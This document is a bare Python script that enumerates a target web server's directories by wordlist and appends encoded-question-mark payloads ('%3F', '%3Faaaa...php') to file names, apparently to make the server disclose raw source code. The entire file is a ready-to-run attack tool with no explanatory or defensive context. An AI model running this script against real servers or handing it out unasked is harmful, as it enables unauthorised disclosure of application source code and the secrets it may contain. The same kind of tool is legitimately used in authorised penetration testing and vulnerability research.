from termcolor import colored
import requests
import argparse

def directories(webroot, url_ip_domain, schema, directory_wordlist):
    with open(directory_wordlist, 'r', errors='replace') as f:
        lines = [word.strip() for word in f.readlines()]
        for line in lines:
            r = requests.get(f"{schema}://{url_ip_domain}/{line}/", allow_redirects=False)
            if r.status_code == 403:
                print(colored(f"Found directory - {line} in {webroot}", "green"))

def source_code_files(webroot, url_ip_domain, schema, file_wordlist):
    with open(file_wordlist, 'r', errors='replace') as f:
        lines = [word.strip() for word in f.readlines()]
        for line in lines:
            for payload in ["%3F", "%3Faaaaaaaaaaaaaaaaaaaaaa.php"]:
                r = requests.get(f"{schema}://{url_ip_domain}/{webroot}/{line}{payload}", allow_redirects=False)
                if r.status_code == 200:
                    print(colored(f"Response code: {r.status_code} | Found File - Payload: {r.url} in {webroot}", "green"))

def main(webroot_file, url_ip_domain, schema, directory_wordlist, file_wordlist):
    with open(webroot_file, 'r') as f:
        webroots = [line.strip() for line in f.readlines()]
    
    for webroot in webroots:
        print(colored(f"\nLooking for 403 directories in {webroot}.", "yellow"))
        directories(webroot, url_ip_domain, schema, directory_wordlist)

        print(colored(f"\nLooking for interesting source code disclosures in {webroot}.", "yellow"))
        source_code_files(webroot, url_ip_domain, schema, file_wordlist)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Webroot and file enumeration script.')
    parser.add_argument('--webroots', type=str, required=True, help='Path to the webroots file (TXT)')
    parser.add_argument('--url', type=str, required=True, help='Target URL or IP address (e.g., 127.0.0.1)')
    parser.add_argument('--schema', type=str, choices=['http', 'https'], default='http', help='Schema to use (http or https)')
    parser.add_argument('--directory_wordlist', type=str, required=True, help='Path to the directory wordlist file (TXT)')
    parser.add_argument('--file_wordlist', type=str, required=True, help='Path to the file wordlist file (TXT)')

    args = parser.parse_args()

    main(args.webroots, args.url, args.schema, args.directory_wordlist, args.file_wordlist)
